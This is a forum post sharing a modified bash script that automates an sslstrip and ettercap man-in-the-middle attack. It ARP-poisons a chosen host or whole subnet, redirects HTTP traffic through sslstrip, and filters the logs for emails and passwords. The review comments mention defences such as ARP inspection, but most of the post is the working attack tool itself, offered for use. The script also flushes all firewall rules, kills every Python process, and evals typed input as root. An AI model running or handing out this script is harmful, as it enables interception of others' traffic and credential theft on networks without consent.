I modded the following script, and it works smoothly on an SGS3 (sslstrip + ettercap).
Code:
#!/bin/bash
# Nombre: sslsnif.sh
# Autor: foro backtrack
# Credits to: dsniff-fr0g
# Modified by [W][0][C][@][R]
# ANSI escape sequences for coloured output. They are stored as literal
# text and only interpreted where a later `echo -e` expands them.
txtdef='\e[0;00m'     # back to the terminal default
txtred='\e[01;31m'    # bold red
txtblue='\e[01;34m'   # bold blue
function po () {
  # Print a framed summary of the current session settings to stdout.
  # Reads globals: IFACE, tmac, dbcast, tlocalip, SESSION, filter, MODE,
  # ROUTER, VICTIM and the colour strings txtred / txtblue / txtdef.
  local frame="#####################################"
  # An empty ROUTER or VICTIM is displayed as "*".
  local shown_gateway=${ROUTER:-*}
  local shown_target=${VICTIM:-*}

  printf '%s\n' \
    "" \
    "$frame" \
    "Interface $IFACE" \
    "Local MAC $tmac" \
    "Subnet $dbcast" \
    "Local IP $tlocalip" \
    "Folder /root/capture/$SESSION/" \
    "Filter $filter"
  # echo -e so the colour escape sequences are interpreted.
  echo -e "Attack Mode ${txtred}$MODE${txtdef}"
  echo -e "Gateway ${txtblue}${shown_gateway}${txtdef}"
  echo -e "Target ${txtblue}${shown_target}${txtdef}"
  #echo "Ettercap: ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/"
  printf '%s\n' "$frame" ""
}
function usage()
{
  # Print the option summary to stdout; $0 is the name the script was run as.
  printf '%s\n' \
    "usage: $0 options" \
    "Script helper for SSLSTRIP MITM attacks" \
    "OPTIONS:" \
    "-n No spoof (will not run ettercap)" \
    "-f Filter (ex: 'grep username', or '-f NOF' )" \
    "-w Write logs to dir in /root/capture/example" \
    "-i Interface (default:wlan0)" \
    "-m Moo"
}
# Defaults that the option parser and the prompts may override later.
IFACE="wlan0"
norun="false"
SESSION=
defaultfilter='egrep -i "email|pass"'

# Local network facts, scraped from `route` and `ifconfig` output.
# NOTE(review): every probe names wlan0 literally and runs before option
# parsing, so a later -i does not change these values. The field positions
# presumably match the legacy net-tools ifconfig layout ("Bcast", "HWaddr");
# confirm on the target system.

# Gateway column of the default route that mentions wlan0.
dgateway=$(route | grep default | grep wlan0 | awk '{print $2}' \
  | awk '{split($0,array," ")} END{print array[1]}')

# First three octets of the value after the colon in the third field of the
# "Bcast" line.
dbcast=$(ifconfig wlan0 | grep Bcast \
  | awk '{split($0,array," ")} END{print array[3]}' \
  | cut -d":" -f2 | cut -d '.' -f1-3)

# Fifth field of the "HWaddr" line.
tmac=$(ifconfig wlan0 | grep HWaddr \
  | awk '{split($0,array," ")} END{print array[5]}')

# Value after the colon in the second field of the "Bcast" line.
tlocalip=$(ifconfig wlan0 | grep Bcast \
  | awk '{split($0,array," ")} END{print array[2]}' \
  | cut -d":" -f2)
# Parse the command-line options into the globals set up above.
while getopts "hnm?:i:f:w:" OPTION; do
  case "$OPTION" in
    h) usage; exit 1 ;;
    n) norun="true" ;;
    w) SESSION=$OPTARG ;;
    i) IFACE=$OPTARG ;;
    m) echo "MOOO"; exit 1 ;;
    # NOTE(review): as written, -f stores its argument and then exits with
    # status 1, so the script ends in this branch.
    f) defaultfilter=$OPTARG; exit 1 ;;
    # Unquoted ? is a glob here: it matches any single remaining character,
    # including the "?" that getopts reports for an unknown option.
    ?) usage; exit ;;
  esac
done
# Interactive configuration: collect the session folder, target, gateway and
# log filter from the terminal, then derive the display mode.
# Placeholder values; the prompts below overwrite them (see the ROUTER note).
VICTIM=null
ROUTER=null
filter=none
# Ask for the capture folder name unless -w already supplied one.
# NOTE(review): the answer is later pasted unquoted into paths under
# /root/capture/; spaces, glob characters or "../" are not rejected here.
# `read` is used without -r throughout, so backslashes in answers are
# interpreted rather than kept literally.
if [ "$SESSION" = "" ]
then
echo -n "Folder to save logs: /root/capture/"
read -e SESSION
fi
# Only the last octet is typed; it is appended to the $dbcast prefix.
echo -n "Target IP (blank = whole ARP network) - $dbcast."
read -e host
if [ "$host" = "" ]
then
# Blank answer: both target specs are left empty.
VICTIM=""
ROUTER=""
else
VICTIM="$dbcast.$host"
echo -n "Gateway IP (blank = $dgateway): "
read -e gate
# NOTE(review): ROUTER is assigned only when the answer is blank. A typed
# value stays in $gate and ROUTER keeps the placeholder "null".
if [ "$gate" = "" ]
then
ROUTER="$dgateway"
fi
fi
# The filter is free text; it is executed later through `eval`.
echo -n "Filter for tail: (blank = $defaultfilter)"
read -e filter
if [ "$filter" = "" ]
then
filter="$defaultfilter"
fi
# MODE is a display label only; it is printed by po.
if [ "$VICTIM" = "" ]
then
MODE="ALL NETWORK"
else
MODE="SINGLE IP"
fi
# Show the settings summary, count down from 4, then clear the terminal.
po
echo -n "Staring in "
seconds=4
while (( seconds > 0 )); do
  echo -n "$seconds.. "
  sleep 1
  (( seconds-- ))
done
echo "GO"
sleep 2
clear
#------------- start ---------------
# Set-up phase: create the capture folder, reset the firewall, start the
# proxy in the background and follow its log through the chosen filter.
echo "==================================="
# NOTE(review): unquoted path built from user input, no -p, and the result is
# not checked; if this fails the later -w/-L paths point at a missing folder.
mkdir /root/capture/$SESSION/
# NOTE(review): these four commands empty the filter and nat tables and delete
# their user-defined chains. Whatever ruleset the host had before is discarded
# and nothing in this script saves or restores it.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# sslstrip runs as a background job, listening on port 1338 and writing its
# log into the session folder.
sslstrip -p -l 1338 -k -w /root/capture/$SESSION/$SESSION.log &
sleep 3
# Redirect TCP traffic with destination port 80 arriving at this host to the
# local port 1338. Only port 80 is matched: a client that uses HTTPS from its
# first request (HSTS preload, HTTPS-only mode) never enters this rule.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1338
sleep 3
# Follow the log and pipe it through the filter, in the background.
# NOTE(review): `eval $filter` executes the typed filter text as shell code
# with the script's privileges (presumably root, given the /root paths and the
# iptables calls), and the unquoted expansion is word-split before eval sees it.
tail /root/capture/$SESSION/$SESSION.log -f -n 10 | eval $filter &
# Main phase: with -n only the proxy and the redirect stay active until Enter
# is pressed; otherwise ettercap runs in the foreground and the script resumes
# when it exits.
if [ "$norun" = "true" ]
then
echo "Not launching MITM attack (-n)"
read -p "Press [Enter] key to end the attack..."
else
# -T text interface, -i interface, -w pcap output, -L log file prefix,
# -M arp ARP-based MITM between the two target specs. Empty ROUTER and VICTIM
# expand to "//" "//". All expansions are unquoted.
# Defensive side: ARP-based interception changes the IP-to-MAC mapping that
# hosts hold for the gateway, which is what ARP monitoring and switch-level
# dynamic ARP inspection are built to detect or block.
ettercap -T -i $IFACE -w /root/capture/$SESSION/$SESSION.pcap -L /root/capture/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
fi
# Tear-down phase: stop the helper processes, reset the firewall again and
# show the collected logs.
#urlsnarf -i $IFACE | grep http > /root/capture/$SESSION/$SESSION.txt &
#"$XTRACT"tcpxtract -f /root/capture/$SESSION/$SESSION.pcap
#"$NOYES"wireshark &
# NOTE(review): killall matches by process name, not by the PIDs this script
# started. Every tail, sslstrip, ettercap, python and urlsnarf process visible
# to the caller is signalled, including unrelated ones (any running Python
# program, for example).
killall tail
killall sslstrip
killall ettercap
killall python
killall urlsnarf
# Second full reset of the filter and nat tables. The ruleset that existed
# before the script ran is not put back, so the host is left with no firewall
# rules from these tables.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
# Read the .eci file in the session folder (presumably the log written by
# ettercap -L above; confirm).
etterlog -p -i /root/capture/$SESSION/$SESSION.eci
po
echo "Show sslstrip log? blank = yes: "
read -e byes
# The answer is glued in front of "cat" to form the command name: blank runs
# plain `cat`, anything else yields a different command name (normally not
# found), so the log is skipped.
"$byes"cat /root/capture/$SESSION/$SESSION.log